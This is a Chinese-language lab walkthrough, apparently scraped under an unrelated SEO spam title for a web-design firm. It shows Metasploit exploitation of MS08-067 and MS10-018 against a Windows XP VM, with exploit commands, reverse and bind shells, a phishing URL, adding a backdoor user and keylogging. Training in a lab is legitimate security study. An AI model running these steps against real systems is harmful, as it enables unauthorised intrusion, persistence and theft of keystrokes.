黄骅做网站_黄骅昊信科技|黄骅网站|黄骅网站开发|黄骅微信|黄骅海南网站推广

黄骅做网站_黄骅昊信科技|黄骅网站|黄骅网站开发|黄骅微信|黄骅,海南网站推广,白云商城网站建设,网站开发需求方案模板以两个windows主机层面的漏洞#xff0c;简单演示一下msf框架的使用。 MS08-067 简介 影响范围#xff1a;MS08-067漏洞会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本#xff0c;甚至还包括测试阶段的Windows 7 Pro-Beta。 漏洞产生的原因及攻击效果简单演示一下msf框架的使用。MS08-067简介影响范围MS08-067漏洞会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本甚至还包括测试阶段的Windows 7 Pro-Beta。漏洞产生的原因及攻击效果如果用户在受影响的系统上收到特制的 RPC 请求则可能导致攻击者在未经身份验证的情况下利用此漏洞运行任意代码实现远程代码执行。现阶段已经可以通过防火墙来阻断该漏洞的攻击。漏洞利用先测试网络连通性1.输入msfconsole进入msf终端2.查找利用ms08-067漏洞利用模块search ms08-067use exploit/windows/smb/ms08_067_netapi3.查看该攻击模块下所需的配置信息show options4.设置options设置攻击payload为bind模式set payload windows/meterpreter/bind_tcpreverse_tcp 反弹shell xp主动连接kalibind_tcp主动连接 kali主动攻击xp 不需要xp主机用户做啥操作啥都不做就会被打设置靶机地址set RHOST 192.168.1.6查看targets选择攻击目标set target 345.检查options配置6.expliot利用该漏洞 出现meterpreter则代表利用成功 拿到了系统的shell后渗透出现meterpreter则代表漏洞利用成功 接下来可以做一些后渗透的动作了比如查看配置 进入win命令行 添加用户 键盘监听等1.进入Windows Shellshell刚刚还是在msf攻击的控制台 现在是在windows的shell命令行2.添加用户net user didi 123 /add3.使用 ps 查看进程4.使用ps找到合适的进程进行迁移迁移到有管理员权限的进程比如我迁移到ie浏览器进程开启键盘记录后 在xp浏览器端不管键盘敲什么都会被记录下来执行keyscan_dump查看记录的情况keyscan_stop 关闭键盘记录MS10-018漏洞简介MS10-018是IE浏览器上的漏洞主要危害Internet Explorer 6~7攻击者可以通过该漏洞获取受害主机的控制权。┗|O′|┛ 嗷~~ 是打浏览器的漏洞不是打系统的但是同样可以达到RCE的效果漏洞利用实验环境kali虚拟机 winxp虚拟机先把防火墙打开 否则不需要受害者主机浏览器访问触发反弹shell就能执行成功msf杀死某个session的命令sessions -k 11.启动msf 搜索ms10_018msfconsole search ms10_0182.使用对应的exploituse exploit/windows/browser/ms10_018_ie_behaviors3.查看需要的配置 并且进行配置payload采用reverse_tcp反弹shell的方式所以需要反弹地址SRVHOST可以设置其他地址 我们还是设置kali机器为反弹地址此外也可以设置一下 URIPATH 这是钓鱼网站的url 需要受害者主机去访问该url 才能进行反弹shellset SRVHOST 192.168.1.134 set URIPATH test666查看修改后的配置4.运行exploit5.受害者主机访问http://192.168.1.134:8080/test6666.反弹shell成功7.进入会话中利用该会话